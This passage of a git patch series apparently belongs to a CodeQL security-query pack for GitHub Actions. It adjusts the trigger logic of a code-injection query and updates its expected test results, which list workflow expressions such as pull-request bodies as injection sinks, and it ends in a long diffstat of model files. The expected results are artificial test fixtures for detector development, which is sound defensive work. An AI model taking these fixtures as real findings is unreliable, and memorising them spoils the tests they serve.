@@ -22,7 +22,7 @@ where CodeInjectionFlow::flowPath(source, sink) and j = sink.getNode().asExpr().getEnclosingJob() and // job can be triggered by an external user - j.isExternallyTriggerable() and + j.getATriggerEvent().isExternallyTriggerable() and // excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 484121163634..a65f85d0486f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
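Review bot: `not j.isPrivileged()` in CachePoisoningByCodeInjection.ql keeps its text but changes meaning in this commit: JobImpl.isPrivileged no longer includes the trigger-based branch (the removed `hasPrivilegedTrigger` call), so a job with no declared permissions on, say, `issue_comment` is no longer excluded as privileged and will now reach this query's results. If the intent of the comment `// excluding privileged workflows since they can be easily exploited in similar circumstances` is unchanged, `not j.isPrivilegedExternallyTriggerable()` or `not (j.isPrivileged() or j.getATriggerEvent().isPrivileged())` is the equivalent filter under the new model. The `where` clause continues outside the hunk.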
@@ -261,7 +261,6 @@ nodes subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index d577e2fd732b..804c4f1df6c2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -260,6 +260,7 @@ nodes | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | subpaths #select +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | From a5c6df3070810e34500a5986b275ee1559cca432 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 18:13:01 +0200 Subject: [PATCH 314/707] Move from yaml to js extractor --- .!79690!.DS_Store | 0 ql/lib/codeql-pack.lock.yml | 22 +++-- .../codeql/actions/dataflow/ExternalFlow.qll | 18 ++--- .../internal/ExternalFlowExtensions.qll | 6 +- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ...rSource_sonarcloud-github-action.model.yml | 2 +- ql/lib/ext/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 2 +- ql/lib/ext/anchore_scan-action.model.yml | 2 +- .../ext/andresz1_size-limit-action.model.yml | 2 +- .../android-actions_setup-android.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 2 +- .../aszc_change-string-case-action.model.yml | 2 +- ...ctions_configure-aws-credentials.model.yml | 2 +- .../axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 4 +- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 +- .../ext/bufbuild_buf-setup-action.model.yml | 2 +- ql/lib/ext/cachix_cachix-action.model.yml | 4 +- ql/lib/ext/changesets_action.model.yml | 2 +- .../ext/cloudflare_wrangler-action.model.yml | 2 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- 
.../ext/dailydotdev_action-devcard.model.yml | 2 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 2 +- .../dawidd6_action-ansible-playbook.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 2 +- ...er-practice_actions-setup-docker.model.yml | 2 +- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 2 +- ql/lib/ext/expo_expo-github-action.model.yml | 2 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-builder.model.yml | 2 +- .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- ...ctions_actions-runner-controller.model.yml | 2 +- .../composite-actions/adap_flower.model.yml | 2 +- .../agoric_agoric-sdk.model.yml | 2 +- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../amazon-ion_ion-java.model.yml | 2 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 2 +- .../ansible_ansible-lint.model.yml | 2 +- .../composite-actions/ansible_awx.model.yml | 2 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 2 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 2 +- .../composite-actions/apache_camel.model.yml | 2 +- .../composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../composite-actions/apache_nuttx.model.yml | 2 +- .../apache_opendal.model.yml | 2 +- .../composite-actions/apache_pekko.model.yml | 2 +- 
.../apache_pulsar-helm-chart.model.yml | 2 +- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 2 +- .../aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 2 +- .../auth0_auth0-java.model.yml | 2 +- .../auth0_auth0.net.model.yml | 2 +- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 2 +- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- ...ertools_powertools-lambda-python.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../azure_azure-datafactory.model.yml | 2 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 2 +- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../broadinstitute_gatk.model.yml | 2 +- .../canonical_multipass.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../chocobozzz_peertube.model.yml | 2 +- .../cilium_cilium-cli.model.yml | 2 +- .../composite-actions/cilium_cilium.model.yml | 2 +- .../citusdata_citus.model.yml | 2 +- .../clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 2 +- 
.../conan-io_conan-center-index.model.yml | 2 +- .../corretto_corretto-8.model.yml | 2 +- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 2 +- .../composite-actions/d2l-ai_d2l-en.model.yml | 2 +- ...build-check-deploy-gradle-action.model.yml | 2 +- .../datadog_dd-trace-dotnet.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-js.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../davatorium_rofi.model.yml | 2 +- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 2 +- .../diggerhq_digger.model.yml | 2 +- .../diku-dk_futhark.model.yml | 2 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 2 +- .../drawpile_drawpile.model.yml | 2 +- .../eksctl-io_eksctl.model.yml | 2 +- .../elastic_apm-agent-dotnet.model.yml | 2 +- .../elastic_apm-agent-java.model.yml | 2 +- .../elastic_apm-server.model copy.yml | 2 +- .../elementor_elementor.model.yml | 2 +- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 2 +- .../eonasdan_tempus-dominus.model.yml | 2 +- .../composite-actions/erlang_otp.model.yml | 2 +- .../esphome_esphome.model.yml | 2 +- .../composite-actions/expensify_app.model.yml | 2 +- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 2 +- 
.../facebookresearch_xformers.model.yml | 2 +- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 2 +- .../firebase_firebase-ios-sdk.model.yml | 2 +- .../flagsmith_flagsmith.model.yml | 2 +- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 2 +- .../composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 2 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../composite-actions/gaphor_gaphor.model.yml | 2 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 2 +- .../composite-actions/github_ruby.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- .../go-spatial_tegola.model.yml | 2 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 2 +- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 4 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../home-assistant_android.model.yml | 2 +- .../homebrew_actions.model.yml | 2 +- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../igniterealtime_openfire.model.yml | 2 +- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 2 +- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../ionic-team_ionicons.model.yml | 2 +- .../ionic-team_stencil.model.yml | 2 +- .../composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- 
.../jhipster_generator-jhipster.model.yml | 4 +- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../keycloak_keycloak.model.yml | 2 +- .../composite-actions/kserve_kserve.model.yml | 2 +- .../kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 2 +- .../kyverno_kyverno.model.yml | 2 +- .../composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../ldc-developers_ldc.model.yml | 2 +- .../ledgerhq_ledger-live.model.yml | 2 +- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 2 +- .../libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../lightning-ai_torchmetrics.model.yml | 2 +- .../linkerd_linkerd2.model.yml | 4 +- .../logseq_publish-spa.model.yml | 2 +- .../macvim-dev_macvim.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- .../maplibre_maplibre-native.model.yml | 2 +- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 2 +- .../mdanalysis_mdanalysis.model.yml | 2 +- .../medic_cht-core.model.yml | 2 +- .../medusajs_medusa.model.yml | 2 +- .../metabase_metabase.model.yml | 2 +- ...etamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 2 +- .../composite-actions/microsoft_wsl.model.yml | 2 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 2 +- .../mozilla_addons-server.model.yml | 2 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- 
.../mumble-voip_mumble.model.yml | 2 +- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 2 +- ..._optic-release-automation-action.model.yml | 2 +- .../composite-actions/nektos_act.model.yml | 2 +- ...4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 2 +- .../composite-actions/novuhq_novu.model.yml | 4 +- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 2 +- .../composite-actions/ocaml_dune.model.yml | 2 +- .../oneflow-inc_oneflow.model.yml | 2 +- ...metry_opentelemetry-ruby-contrib.model.yml | 2 +- ...pen-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- ...enzeppelin-contracts-upgradeable.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts.model.yml | 2 +- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 2 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 2 +- .../owntracks_android.model.yml | 2 +- .../pandas-dev_pandas.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- .../phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 +- .../composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 2 +- 
.../composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../projectnessie_nessie.model.yml | 2 +- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../composite-actions/quay_clair.model.yml | 2 +- .../quickwit-oss_quickwit.model.yml | 2 +- .../composite-actions/r-lib_actions.model.yml | 2 +- .../randombit_botan.model.yml | 2 +- .../raspberrypi_documentation.model.yml | 2 +- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 2 +- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 2 +- .../composite-actions/risc0_risc0.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../composite-actions/rook_rook.model.yml | 2 +- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 2 +- .../composite-actions/rusefi_rusefi.model.yml | 2 +- .../saltstack_salt.model.yml | 2 +- .../composite-actions/saltstack_salt.yml | 2 +- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 2 +- .../composite-actions/scitools_iris.model.yml | 2 +- .../scylladb_scylla-operator.model.yml | 2 +- .../shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- ...ode_react-webpack-rails-tutorial.model.yml | 2 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 2 +- .../solidusio_solidus.model.yml | 2 +- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 2 +- .../sonic-pi-net_sonic-pi.model.yml | 2 +- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml 
| 2 +- .../spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- ...spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../square_workflow-kotlin.model.yml | 2 +- .../stefanprodan_podinfo.model.yml | 2 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 2 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../treeverse_lakefs.model.yml | 2 +- .../trezor_trezor-firmware.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../trunk-io_trunk-action.model.yml | 2 +- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 2 +- .../composite-actions/vkcom_vkui.model.yml | 2 +- .../vuetifyjs_vuetify.model.yml | 2 +- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 2 +- .../composite-actions/wazuh_wazuh.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 2 +- .../composite-actions/zcash_zcash.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 2 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../reusable-workflows/adap_flower.model.yml | 2 +- .../aio-libs_multidict.model.yml | 2 +- .../aio-libs_yarl.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- 
.../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 2 +- .../reusable-workflows/apache_flink.model.yml | 2 +- .../reusable-workflows/apache_spark.model.yml | 2 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 2 +- .../argoproj_argo-rollouts.model.yml | 2 +- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 2 +- .../bbq-beets_avocaddo-cmw.model.yml | 2 +- .../bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 2 +- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 2 +- .../celo-org_celo-blockchain.model.yml | 2 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 2 +- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../clickhouse_clickhouse.model.yml | 2 +- .../cloudfoundry_cli.model.yml | 2 +- ...thub-action-matrix-outputs-write.model.yml | 2 +- .../cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../com-lihaoyi_mill.model.yml | 2 +- .../cosmos_ibc-go.model.yml | 2 +- .../crowdsecurity_crowdsec.model.yml | 2 +- .../cryptomator_cryptomator.model.yml | 2 +- .../daeuniverse_dae.model.yml | 2 +- .../dafny-lang_dafny.model.yml | 2 +- .../dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../dbt-labs_dbt-bigquery.model.yml | 2 +- .../dbt-labs_dbt-core.model.yml | 2 +- .../dbt-labs_dbt-snowflake.model.yml | 2 +- .../decidim_decidim.model.yml | 
2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 2 +- .../dfhack_dfhack.model.yml | 2 +- .../docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 2 +- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 +- .../envoyproxy_envoy.model.yml | 2 +- .../etcd-io_bbolt.model.yml | 2 +- .../reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../eventstore_eventstore.model.yml | 2 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../falcosecurity_falco.model.yml | 2 +- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 2 +- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 2 +- .../foundatiofx_foundatio.model.yml | 2 +- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 2 +- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 2 +- .../getsentry_sentry-unity.model.yml | 2 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 2 +- .../hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 2 +- .../hashicorp_terraform-cdk.model.yml | 2 
+- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../reusable-workflows/heroku_cli.model.yml | 2 +- .../hitobito_hitobito.model.yml | 4 +- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../huggingface_doc-builder.model.yml | 2 +- .../huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../kairos-io_kairos.model.yml | 2 +- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../reusable-workflows/kiali_kiali.model.yml | 2 